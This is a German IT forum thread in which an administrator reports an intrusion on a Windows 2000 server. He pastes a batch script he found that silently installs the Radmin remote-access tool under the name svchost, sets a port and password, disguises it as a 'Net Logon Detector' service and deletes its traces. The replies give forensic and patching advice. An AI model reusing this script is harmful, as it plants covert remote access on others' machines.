Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Angriff auf W2k Server - RAdmin

Mitglied: 3080

3080 (Level 1)

17.01.2005, aktualisiert 09.01.2009, 5971 Aufrufe, 5 Kommentare

Als ich unseren Win2000 Server wegen der neusten Windows-Updates rebootet habe war auf einmal folgendes Symbol/Programm aktiv bzw. in der Taskleiste zu sehen:

<img src='/images/articles/1632a072e2b31656b01d16faa7dbf233-radmin.jpg' align='default' hspace='0' vspace='0' border='0'>

Nach hin- und hersuchen und Informationen einholen hab ich dann schliesslich einige Dateien in Winnt\Installer\{irgendeinHashwert} gefunden, unter anderem auch folgende Batch-Datei:

@echo off
rmico
svchost /install /silence
svchost /save /port:18 /pass:An30Gm34 /silence
net start R_server
svcinst -c R_server "Net Logon Detector"
del rmico.reg /a/f/q
del rmico.exe /a/f/q
del temp2.bat /a /f /q

Hier hat wohl jemand ein Fernadministrations-Tool installiert, aber könnt Ihr mir sagen was hier genau abläuft? Habe die dazugehörigen Dateien gelöscht, Einträge in der Registry unter dem Namen "RAdmin" entfernt, den Remote-Registry-Dienst gestoppt und den Server neu gestartet. Jetzt ist das Symbol zwar weg, aber mich würde trotzdem mal interessieren wie es dahinkommt und welchen Risiken der Server ausgesetzt ist damit sowas überhaupt möglich ist. Gibt es eine zuverlässige Firewall für W2k Server um sich vor soetwas zu schützen?
Mitglied: 7217
17.01.2005 um 14:51 Uhr
Herzlichen Glückwunsch:

du hast mit deiner voreiligen Aktion sämtliche Beweise vernichtet! Was du cleverer hättest machen sollen wäre eine komplette Sicherung des Systems gewesen (vorher alle Netzwerkaktivitäten sichern, damit man weiss, in welchem Status das Gerät aktuell war und ob evtl. noch Verbindungen zum Feind bestanden haben).

Anschließend hätte ich den Server vom Netz genommen und "Forensik" betrieben, was genau bedeutet, dass man mal versucht herauszufinden, welche Löcher man sich denn in die Sicherheit seines Servers geschossen hat.

Firewalls (auf dem Server) dürften dich vor sowas nur sehr marginal schützen. Sicherer ist es, den Patchstatus des Servers aktuell zu halten und auf jeden unnötigen Schnickschnack zu verzichten.

Gruß, Mupfel
Bitte warten ..
Mitglied: fresch-heit
18.01.2005 um 19:27 Uhr
/ironie/
hast du echt ne direkte verbindungs ins inet... ohne firewall /virenscanner sowas gibts noch ;)) und ich wunder mich warum sich viren immer noch so verbreiten... tsss
/ironie/
Bitte warten ..
Mitglied: 7217
18.01.2005 um 19:36 Uhr
Ich sprach von einer Firewall AUF dem Server... was ich VOR meinen Servern habe, ist ne ganz andere Geschichte.

Gruß, Mupfel
Bitte warten ..
Mitglied: priez
07.03.2005 um 17:20 Uhr
ich hab remoteadministrator zuhause aufm pc drauf. ist ein einfaches remote tool. soll einige lücken haben und knackbar sein.

ich hätte den Server vom Netz genommen (und wenn das nicht geht, zumindest den im server eingestellten "incoming port" gesperrt (standard 4899 oder so)). Danach hätte ich mir mal die logfiles angeschaut... oder wenn du eindeutig beim angriff benutzte dateien hast, alles im system mit dem gleichen erstelldatum (zeitraum) gesucht.

Wenn das Ding schon gelaufen ist ( >3 std), hast du praktisch keine chance mehr. Er hat damit vollzugriff und mit 1-3 scripten hat er vmware oder weiss sonst was dazuinstalliert.

Viel Spass beim neuinstallieren oO
Bitte warten ..
Mitglied: priez
07.03.2005 um 17:22 Uhr
nachtrag:

wenn du davor eine gute FW hast brauchst du auf dem server kaum noch eine. Du solltest lieber den patchstatus aktuell halten (wie schon gesagt wurde) und dir deine 3rd Party Programme, welche netzwerkdienste anbieten, mal genauer anschaun...
Bitte warten ..
Ähnliche Inhalte
Viren und Trojaner
Eventueller Malware Angriff auf nginx...
Frage von linuxverbrezlerViren und Trojaner4 Kommentare

Hab grad die Access Log von Nginx durchgeforstet hier taucht ab und an folgendes auf: 185.4.227.194 05/Mar/2014:08:19:21 +0100 "GET ...

CPU, RAM, Mainboards

IAMT KVM-Zugriff (RADMIN-Viewer, VNC-Viewer, . )

gelöst Frage von moar70CPU, RAM, Mainboards7 Kommentare

Hallo! Ich habe auf meiner TAROX-Workstation (Mainboard Fujitsu D3128 B2) iAMT (Version ME 8.1.40.1416) konfiguriert. Der Webzugriff mittels funktioniert, ...

Sicherheit

Angriff auf meinen internen Webserver?

gelöst Frage von tguhl99Sicherheit8 Kommentare

Hallo, ich habe ein Problem mit meinen Netz. Auf einem internen Server läuft mein Intranet mit xampp. Es gibt ...

Erkennung und -Abwehr

Ankündigung eines DDoS Angriffs

gelöst Frage von runasserviceErkennung und -Abwehr23 Kommentare

Hallo, kurze Anfrage in die Runde. Sind solche "Spam-Mails" ernst zu nehmen? Vielen Dank

Neue Wissensbeiträge
Google Android

Googles "Android Enterprise Recommended" für Unternehmen

Information von kgborn vor 8 StundenGoogle Android3 Kommentare

Hier eine Information, die für Administratoren und Verantwortliche in Unternehmen, die für die Beschaffung und das Rollout von Android-Geräten ...

Sicherheit

Intel gibt neue Spectre V2-Microcode-Updates frei (20.02.2018)

Information von kgborn vor 9 StundenSicherheit

Intel hat zum 20. Februar 2018 weitere Microcode-Updates für OEMs freigegeben, um Systeme mit neueren Prozessoren gegen die Spectre ...

Microsoft
ARD-Doku - Das Microsoft Dilemma
Tipp von Knorkator vor 12 StundenMicrosoft3 Kommentare

Hallo zusammen, vor einigen Tagen lief in der ARD u.a. Reportage. Das Youtube Video dazu dürfte länger verfügbar sein. ...

Windows 10

Neue Sicherheitslücke in Windows 10 (Version 1709) durch Google öffentlich geworden

Information von kgborn vor 1 TagWindows 10

Vor ein paar Tagen haben Googles Sicherheitsforscher vom Projekt Zero eine Sicherheitslücke im Edge-Browser publiziert. Jetzt wurde eine weitere ...

Heiß diskutierte Inhalte
Windows Server
AD DS findet Domäne nicht, behebbar?
Frage von schapitzWindows Server40 Kommentare

Guten Tag, ich habe bei einem Kunden ein Problem mit den AD DS. Umgebung ist folgende: Windows Server 2016 ...

Router & Routing
LANCOM VPN CLIENT einrichten
Frage von Finchen961988Router & Routing27 Kommentare

Hallo, ich habe ein Problem und hoffe ihr könnt mir helfen, wir haben einen Kunden der hat einen Speedport ...

Router & Routing
ISC DHCP 2 Subnetze
gelöst Frage von janosch12Router & Routing19 Kommentare

Hallo, ich betreibe bei mir im Netzwerk einen ISC DHCP Server auf Debian, der DHCP verwaltet aktuell ein /24 ...

Switche und Hubs
Cisco SG350X-48 AdminIP in anderes VLAN
Frage von lcer00Switche und Hubs14 Kommentare

Hallo zusammen, ich habe ein Problem mir einem Cisco SG350X-48 bei der Erstinstallation wurde eine IP 192.168.0.254 (Default VLAN ...